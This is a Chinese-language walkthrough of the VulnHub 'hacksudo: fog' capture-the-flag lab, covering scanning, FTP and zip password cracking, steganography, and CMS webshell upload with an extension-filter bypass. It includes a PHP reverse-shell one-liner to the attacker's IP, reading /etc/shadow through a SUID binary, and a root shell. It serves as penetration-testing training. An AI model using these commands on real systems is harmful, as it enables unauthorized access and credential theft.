環境
Kali: 192.168.132.131
靶機:192.168.132.146 靶機地址:https://www.vulnhub.com/entry/hacksudo-fog,697/
一、資訊收集
nmap -sP 192.168.132.0/24

nmap -p- -sC -sV 192.168.132.146


gobuster dir -u [http://192.168.132.146](http://192.168.132.146) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500 -t 100 -x .php,.html,.txt,.bak,.zip

二、漏洞探測
http://192.168.132.146/index1.html
查看源代碼,發現提示,提供一個腳本用來分離音頻中的私密資訊(目前不知道干什么用)

http://192.168.132.146/dict.txt 該靶機可能需要暴力破解密碼

http://192.168.132.146/fog/
存在目錄遍歷漏洞,但是沒有檔案
http://192.168.132.146/cms/
發現可能是用戶名

靶機中開啟ftp服務,有用戶名嘗試利用獲得字典檔案進行暴力破解,獲得密碼
medusa -M ftp -h 192.168.132.146 -u hacksudo -P /tmp/dict.txt

登錄ftp,下載檔案flag1.txt和secr3tSteg.zip檔案

獲得提示

解壓檔案,發現有密碼,暴力破解zip檔案,密碼為:fooled

解壓檔案
unzip secr3tSteg.zip

使用提供的腳本查看隱藏資訊
python3 [ExWave.py](http://ExWave.py) -f /root/hacksudoSTEGNO.wav

根據前兩行,可以判斷為凱撒密碼,進行解密,得到用戶fog的密碼

三、漏洞驗證
在cms界面進行登錄

在站點中可以上傳一句話木馬檔案,站點檢測上傳檔案是否危險,修改后綴名,進行繞過,上傳之后在修改檔案后綴名

也可以找到cmsmsrce.txt,存在一句話木馬,修改檔案后綴名成php,進行反彈獲得shell
http://192.168.132.146/cms/uploads/cmsmsrce.txt

反彈代碼
php -r '$sock=fsockopen("192.168.132.131",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
需要將傳遞內容,進行url編碼
http://192.168.132.146/cms/uploads/shell.php?cmd=php%20-r%20'%24sock%3dfsockopen(%22192.168.132.131%22%2c4444)%3bexec(%22%2fbin%2fsh%20-i%20%3c%263%20%3e%263%202%3e%263%22)%3b'
開啟監聽埠,反彈獲得shell

四、提權
#查找高權限命令
find / -perm -u=s -type f 2>/dev/null

look '' /etc/shadow

破解isro用戶的密碼
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

使用isro的密碼登錄ssh
ssh [[email protected]](mailto:[email protected])

在/home/isro/fog中,找到了一個root用戶的可執行檔案,

運行fog,獲取python shell,檢查id,它的權限是root,

使用python的pty庫獲得root的shell
import pty; pty.spawn("/bin/bash")

獲得flag

五、總結
這套靶機難易程度容易,使用nmap掃描靶機,使用gobuster掃描目錄,在網站目錄index1.html原始碼中發現提供一個腳本(分離音頻中的私密資訊),在網站目錄dict.txt可能時密碼字典,在網站cms目錄發現可能是用戶名,使用medusa工具使用發現的用戶名和密碼字典進行暴力破解,登錄下載檔案,發現flag,zip檔案存在密碼,使用fcrackzip工具進行破解密碼,解壓檔案,使用提供的腳本查看隱藏資訊,根據前兩行,可以判斷為凱撒密碼,進行解密,得到用戶fog的密碼,在cms界面進行登錄,安裝插件,上傳一句話,獲得shell,查找高權限命令,使用高權限命令look查看/etc/shadow,破解isro用戶密碼,在/home/isro/fog中,找到了一個root用戶的可執行檔案,為root權限的python解釋器,使用python的pty庫獲得root的shell,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302690.html
標籤:其他
上一篇:[一本通1687]積水問題題解
下一篇:VulnHub-Prime-2
